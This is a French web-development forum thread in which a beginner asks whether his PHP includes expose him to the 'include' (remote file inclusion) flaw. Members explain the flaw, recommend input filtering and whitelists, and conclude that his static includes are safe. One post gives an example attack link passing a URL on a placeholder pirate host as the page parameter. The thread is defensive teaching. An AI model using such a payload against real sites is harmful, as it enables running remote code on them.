|
Publicité ' | |||||||||||||||||||||||
|
|
#1 |
|
Candidat au titre de Membre du Club
![]() Étudiant Inscription : mai 2008 Messages : 56 ![]() |
bonjour.
premier message sur ce forum Mon problème du jour: résoudre la faille d'include: en effet sur mon site je met des include pour me connecter à ma base de donnée ect ect les fichiers à protéger se trouvent donc dans un dossier protéger pas mot de passe (htacces ect ect). Hors en parlant avec une personne qui se débrouille mieux que moi il m'a fait penser au fait que la personne peut en voyant tout simplement mon code utiliser le fichier appelé par un adressage du type http://arnaudinnsert.com/protect/connection.php dans un include comment résoudre cette faille?? merci de votre aide |
|
|
00
|
|
|
#2 |
|
Inactif
Il marche comment, ton système d'include ?
Suffit de contrôler ce que tu inclus, pour être sûr qu'il s'agisse d'un script destiné à l'être. |
|
|
00
|
|
|
#3 |
|
Membre éclairé
![]() Inscription : mai 2008 Messages : 359 ![]() |
Bonsoir,
Comment une personne pourrait-elle voir ton code ? A moins que tu ne fasses passer le nom et l'adresse de tes pages à inclure directement dans l'url ? Il vaut mieux éviter ce dernier cas, même si, correctement filtré, rien ne passera. |
|
|
00
|
|
|
#4 | ||
|
merci pour vos réponses
Alors pour la question de comment on peut voir mon code: il parait que voir du php c'est possible justement en utilisant la même faille. j'urilise include comme suis dans ma page php (qui n'est pas dans un dossier protéger) Code :
|
||
|
|
00
|
|
|
#5 | ||
|
Membre éclairé
Une page php n'est normalement pas lisible à partir d'un simple navigateur. Si c'est le cas, ce n'est plus un problème php, c'est une défaillance (grave !) du serveur.
La faille 'include', dans sa version la plus brute (et simplifiée) consiste en ceci : le lien utilisé pour ouvrir la page : le traitement effectué dans la page index.php Code :
Code :
<a href="index.php?page=http://www.grandmechantpirate.ru/mechant.php"> La solution consiste simplement à ne jamais faire confiance à tout ce qui provient de l'extérieur, et donc à filtrer soigneusement toute requête GET ou POST, ainsi qu'à ne pas utiliser des indications aussi précises que '?page=' ou 'include=' suivi d'un nom de fichier. |
||
|
|
00
|
|
|
#6 | ||
|
OK pour ne pas avoir de problème au niveau sécurité avec mes includes il me suffit donc d'utiliser la deuxième méthode c à d:
Code :
merci de ton aide |
||
|
|
00
|
|
|
#7 | |||||
![]() ![]() Dr. PetersWebmaster Inscription : novembre 2006 Messages : 3 630 ![]() |
Bonsoir
Citation:
Code :
Vous débutez dans la creation de sites web : les bases du html et débuter avec les CSS Pas de MP pour des questions techniques ! Mode d'emploi du forum ; Règles ; Pensez à la balise code ; Pas de SMS ! Votez pour les messages qui vous ont aidés...
|
|||||
|
|
00
|
|
|
#8 | ||||
![]() ![]() Guillaume RossoliniDirecteur technique Inscription : février 2004 Messages : 13 720 ![]() |
Salut
Pour éviter tout problème, tu devrais en effet utiliser une liste blanche : Code :
Code :
|
00
|
|
|
#9 | ||
|
je n'utilise pas de methode get ou post juste des include pour appeler ma page qui va s'occuper de tracer l'utilisateur voir si il ne s'amuse pas à essayé de pénétrer dans la partie securisée ou dans la partie admin: dans mon index.php j'ai mit ça: Code :
faut-il quand même que je fasse une liste blache?? merci de votre aide |
||
|
|
00
|
|
|
#10 |
![]() ![]() Guillaume RossoliniDirecteur technique Inscription : février 2004 Messages : 13 720 ![]() |
Ah, désolé, c'est ce message qui m'a induit en erreur : http://www.developpez.net/forums/sho...37&postcount=6
Si tu inclus tes scripts comme tu le montres ici, rien n'est dynamique. Tu n'as donc aucune crainte à avoir de la faille include.
00
|
|
|
#11 |
|
Membre éclairé
Comme je te l'ai dit, si un visiteur peut accéder à tes fichiers de cette manière, ce n'est plus une faille php, c'est une faille (grave et anormale) du serveur : d'un, même si tu ne fais rien, les fichiers contenus dans secure ne sont pas lisibles s'ils ont l'extension .php; de deux, tu peux mettre le dossier secure dans un emplacement non public, c'est-à-dire autre que dans le dossier www ou web ou public_html (selon les cas) ; et de trois, tu peux interdire l'accès à ce dossier par un htaccess.
|
|
|
00
|
|
|
#12 | |||||||||
![]() ![]() Inscription : juillet 2007 Messages : 1 287 ![]() |
Citation:
Alors pour eviter de se fatiguer (faire copier/coller des menus sur toutes les pages est bien trop lent et rend difficile la maintenance), on inclut seulement ce qui vas changer dans la page standard. La structure des liens de la page sera : Code :
Code :
Code :
Code :
Voilà une presentation rapide de la faille include. |
|||||||||
|
|
00
|
|
|
#13 |
darrylsite, je te remercie mais je connais la faille include... Il me semble que ce que tu dis n'a cependant rien à voir avec la question d'adeltimple. Ses liens ne sont pas dynamiques comme dans ton exemple, son site n'est donc pas vulnérable.
adeltimple n'a pour le moment pas de problème de faille include dans ses scripts, il n'y a aucune solution à lui apporter. Ce que tu dis (darrylsite) est vrai, mais j'ai l'impression que pour le moment cela apporte de la confusion sans résoudre aucun problème (puisqu'il n'y en a pas).
00
|
|
|
#14 |
Pour clarifier :
Pour être vulnérable à la faille include, il faut avoir un code de ce style : Si on a du code pleinement statique, rien à craindre : Concernant l'autre interrogation (exécution de code distant), ce n'est pas possible. Chaque fois qu'un client demande un script PHP à un serveur (par HTTP et non par "include" sur la même machine), le serveur interprète le script s'il n'est pas protégé par htaccess. Si tu places un script dans un répertoire protégé par htaccess, il est donc doublement impossible à quelqu'un d'en lire le contenu. Si tu fais include 'http://...script.php', au final cela fait une demande HTTP du script, donc l'autre serveur (même si c'est le tien) va te donner le résultat et non le script lui-même.
00
|
|
|
#15 | ||||
![]() ![]() Dr. PetersWebmaster Inscription : novembre 2006 Messages : 3 630 ![]() |
Citation:
Citation:
Vous débutez dans la creation de sites web : les bases du html et débuter avec les CSS Pas de MP pour des questions techniques ! Mode d'emploi du forum ; Règles ; Pensez à la balise code ; Pas de SMS ! Votez pour les messages qui vous ont aidés...
|
||||
|
|
00
|
|
|
#16 |
|
Membre éclairé
Oui, soi je me suis mal exprimé dans mes explications, soit il a mal compris, alors que j'expliquais simplement la faille include, pour lui monter que ça ne s'applique pas à son cas.
|
|
|
00
|
|
|
#17 |
|
OK merci a tous, je peut donc considérer mon site comme sécurisé pour l'instant
![]() oui désolé de ne pas m'être mieux exprimé :S |
|
|
00
|
|
|
#18 |
|
Membre éclairé
Sécurisé ...
Disons que la faille include ne s'applique pas. C'est tout.
|
|
|
00
|
|
|
#19 |
|
include c'est vachement utile!
tellement pratique que j'en met dans toutes les pages une nouvelle question me vient donc à l'esprit à part la sécurité: http://www.developpez.net/forums/sho...05#post3308505 |
|
|
00
|
Copyright © 2000-2012 - www.developpez.com